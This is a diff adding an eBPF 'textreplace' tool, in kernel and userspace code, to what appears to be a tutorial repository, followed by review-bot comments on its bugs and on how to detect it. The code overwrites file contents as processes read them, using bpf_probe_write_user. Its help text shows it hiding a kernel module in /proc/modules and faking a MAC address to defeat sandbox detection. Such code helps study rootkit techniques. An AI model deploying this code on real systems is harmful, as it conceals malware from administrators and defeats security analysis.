+ if (j >= name_len) {
+ // ***********
+ // We've found out text!
+ // Add location to map to be overwritten
+ // ***********
+ bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY);
+ match_counter++;
+ }
+ bpf_map_delete_elem(&map_name_addrs, &newline_counter);
+ }
+
+ // If we found at least one match, jump into program to overwrite text
+ if (match_counter > 0) {
+ bpf_tail_call(ctx, &map_prog_array, PROG_02);
+ }
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_read")
+int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) {
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
+ if (pbuff_addr == 0) {
+ return 0;
+ }
+ int pid = pid_tgid >> 32;
+ long unsigned int* pName_addr = 0;
+ long unsigned int name_addr = 0;
+ unsigned int match_counter = 0;
+
+ // Loop over every address to replace text into
+ for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
+ match_counter = i;
+ pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter);
+ if (pName_addr == 0) {
+ break;
+ }
+ name_addr = *pName_addr;
+ if (name_addr == 0) {
+ break;
+ }
+
+ // Attempt to overwrite data with out replace string (minus the end null bytes)
+ long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len);
+ // Send event
+ struct event *e;
+ e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
+ if (e) {
+ e->success = (ret == 0);
+ e->pid = pid;
+ bpf_get_current_comm(&e->comm, sizeof(e->comm));
+ bpf_ringbuf_submit(e, 0);
+ }
+ bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, 
text_find);
+
+ // Clean up map now we're done
+ bpf_map_delete_elem(&map_to_replace_addrs, &match_counter);
+ }
+
+ return 0;
+}
diff --git a/src/27-replace/textreplace.c b/src/27-replace/textreplace.c
new file mode 100644
index 0000000..f6621d0
--- /dev/null
+++ b/src/27-replace/textreplace.c
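Review bot: The `bpf_map_delete_elem` calls at the end of the loops in `check_possible_addresses` and `overwrite_addresses` cannot take effect — `map_name_addrs` and `map_to_replace_addrs` are `BPF_MAP_TYPE_ARRAY`, whose elements cannot be deleted (the helper returns -EINVAL), and the return value is dropped — so addresses recorded during one `read()` survive into later invocations, and `overwrite_addresses` can then issue `bpf_probe_write_user` against a stale address that belongs to an unrelated process. Writing a zero back into the slot, `long unsigned int zero = 0; bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &zero, BPF_ANY);` (and likewise for `map_name_addrs`), is what the existing `name_addr == 0` break conditions already expect. `if (buff_addr <= 0)` and `if (name_len < 0)` compare unsigned values, so the first should be `== 0` and the second is dead code; relatedly, `tofind_counter` can reach `loop_size * local_buff_size` (1024), beyond `MAX_POSSIBLE_ADDRS`, and those updates fail silently. Readers of this example should also know that loading any program that calls `bpf_probe_write_user` makes the kernel emit a rate-limited warning naming the loading process, which is a host-side signal worth monitoring for.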
@@ -0,0 +1,202 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include
+#include
+#include "textreplace.skel.h"
+#include "common_um.h"
+#include "common.h"
+
+// Setup Argument stuff
+#define filename_len_max 50
+#define text_len_max 20
+static struct env {
+ char filename[filename_len_max];
+ char input[filename_len_max];
+ char replace[filename_len_max];
+ int target_ppid;
+} env;
+
+const char *argp_program_version = "textreplace 1.0";
+const char *argp_program_bug_address = "";
+const char argp_program_doc[] =
+"Text Replace\n"
+"\n"
+"Replaces text in a file.\n"
+"To pass in newlines use \%'\\n' e.g.:\n"
+" ./textreplace -f /proc/modules -i ppdev -r $'aaaa\\n'"
+"\n"
+"USAGE: ./textreplace -f filename -i input -r output [-t 1111]\n"
+"EXAMPLES:\n"
+"Hide kernel module:\n"
+" ./textreplace -f /proc/modules -i 'joydev' -r 'cryptd'\n"
+"Fake Ethernet adapter (used in sandbox detection): \n"
+" ./textreplace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n"
+"";
+
+static const struct argp_option opts[] = {
+ { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" },
+ { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" },
+ { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" },
+ { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." 
},
+ {},
+};
+static error_t parse_arg(int key, char *arg, struct argp_state *state)
+{
+ switch (key) {
+ case 'i':
+ if (strlen(arg) >= text_len_max) {
+ fprintf(stderr, "Text must be less than %d characters\n", filename_len_max);
+ argp_usage(state);
+ }
+ strncpy(env.input, arg, sizeof(env.input));
+ break;
+ case 'r':
+ if (strlen(arg) >= text_len_max) {
+ fprintf(stderr, "Text must be less than %d characters\n", filename_len_max);
+ argp_usage(state);
+ }
+ strncpy(env.replace, arg, sizeof(env.replace));
+ break;
+ case 'f':
+ if (strlen(arg) >= filename_len_max) {
+ fprintf(stderr, "Filename must be less than %d characters\n", filename_len_max);
+ argp_usage(state);
+ }
+ strncpy(env.filename, arg, sizeof(env.filename));
+ break;
+ case 't':
+ errno = 0;
+ env.target_ppid = strtol(arg, NULL, 10);
+ if (errno || env.target_ppid <= 0) {
+ fprintf(stderr, "Invalid pid: %s\n", arg);
+ argp_usage(state);
+ }
+ break;
+ case ARGP_KEY_ARG:
+ argp_usage(state);
+ break;
+ default:
+ return ARGP_ERR_UNKNOWN;
+ }
+ return 0;
+}
+static const struct argp argp = {
+ .options = opts,
+ .parser = parse_arg,
+ .doc = argp_program_doc,
+};
+
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+ const struct event *e = data;
+ if (e->success)
+ printf("Replaced text in PID %d (%s)\n", e->pid, e->comm);
+ else
+ printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm);
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ struct ring_buffer *rb = NULL;
+ struct textreplace_bpf *skel;
+ int err;
+
+ // Parse command line arguments
+ err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
+ if (err) {
+ return err;
+ }
+ if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') {
+ printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]);
+ exit(1);
+ }
+ if (strlen(env.input) != strlen(env.replace)) {
+ printf("ERROR: input and replace text must be the same length\n");
+ exit(1);
+ }
+
+ // Do common 
setup
+ if (!setup()) {
+ exit(1);
+ }
+
+ // Open BPF application
+ skel = textreplace_bpf__open();
+ if (!skel) {
+ fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
+ return 1;
+ }
+
+ // Let bpf program know our pid so we don't get kiled by it
+ strncpy(skel->rodata->filename, env.filename, sizeof(skel->rodata->filename));
+ skel->rodata->filename_len = strlen(env.filename);
+ skel->rodata->target_ppid = env.target_ppid;
+
+ strncpy(skel->rodata->text_find, env.input, sizeof(skel->rodata->text_find));
+ strncpy(skel->rodata->text_replace, env.replace, sizeof(skel->rodata->text_replace));
+ skel->rodata->text_len = strlen(env.input);
+
+ // Verify and load program
+ err = textreplace_bpf__load(skel);
+ if (err) {
+ fprintf(stderr, "Failed to load and verify BPF skeleton\n");
+ goto cleanup;
+ }
+
+ // Add program to map so we can call it later
+ int index = PROG_01;
+ int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses);
+ int ret = bpf_map_update_elem(
+ bpf_map__fd(skel->maps.map_prog_array),
+ &index,
+ &prog_fd,
+ BPF_ANY);
+ if (ret == -1) {
+ printf("Failed to add program to prog array! %s\n", strerror(errno));
+ goto cleanup;
+ }
+ index = PROG_02;
+ prog_fd = bpf_program__fd(skel->progs.overwrite_addresses);
+ ret = bpf_map_update_elem(
+ bpf_map__fd(skel->maps.map_prog_array),
+ &index,
+ &prog_fd,
+ BPF_ANY);
+ if (ret == -1) {
+ printf("Failed to add program to prog array! 
%s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Attach tracepoint handler
+ err = textreplace_bpf__attach( skel);
+ if (err) {
+ fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Set up ring buffer
+ rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL);
+ if (!rb) {
+ err = -1;
+ fprintf(stderr, "Failed to create ring buffer\n");
+ goto cleanup;
+ }
+
+ printf("Successfully started!\n");
+ while (!exiting) {
+ err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+ /* Ctrl-C will cause -EINTR */
+ if (err == -EINTR) {
+ err = 0;
+ break;
+ }
+ if (err < 0) {
+ printf("Error polling perf buffer: %d\n", err);
+ break;
+ }
+ }
+
+cleanup:
+ textreplace_bpf__destroy( skel);
+ return -err;
+}
diff --git a/src/28-detach/README.md b/src/28-detach/README.md
index 02e7a11..a5625f1 100644
--- a/src/28-detach/README.md
+++ b/src/28-detach/README.md
@@ -1,6 +1,13 @@
 # 后台运行 eBPF 程序 通过使用 `--detach` 运行程序,用户空间加载器可以退出,而不会停止 eBPF 程序。 + +编译: + +```bash +make +``` + 在运行前,请首先确保 bpf 文件系统已经被挂载: ```bash
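Review bot: The `-i` and `-r` branches of `parse_arg` check `strlen(arg) >= text_len_max` but report `filename_len_max` in the error message, telling the user the limit is 50 when it is 20; both `fprintf` calls should pass `text_len_max`. The two `if (ret == -1)` checks after `bpf_map_update_elem` in `main` assume the legacy libbpf return convention; with libbpf 1.0-style strict errors the call returns a negative errno instead, so a failed prog-array update would go unnoticed — `if (ret < 0)` works under both (confirm against the libbpf version in use). The comment `// Let bpf program know our pid so we don't get kiled by it` does not describe the lines below it, which populate `.rodata` with the filename, search/replace text and parent PID; `// Pass filename, search/replace text and optional parent PID to the BPF program via .rodata` would be accurate. The help string for `--replace` says `must be same size as -t`, while the length check in `main` compares it against `-i`.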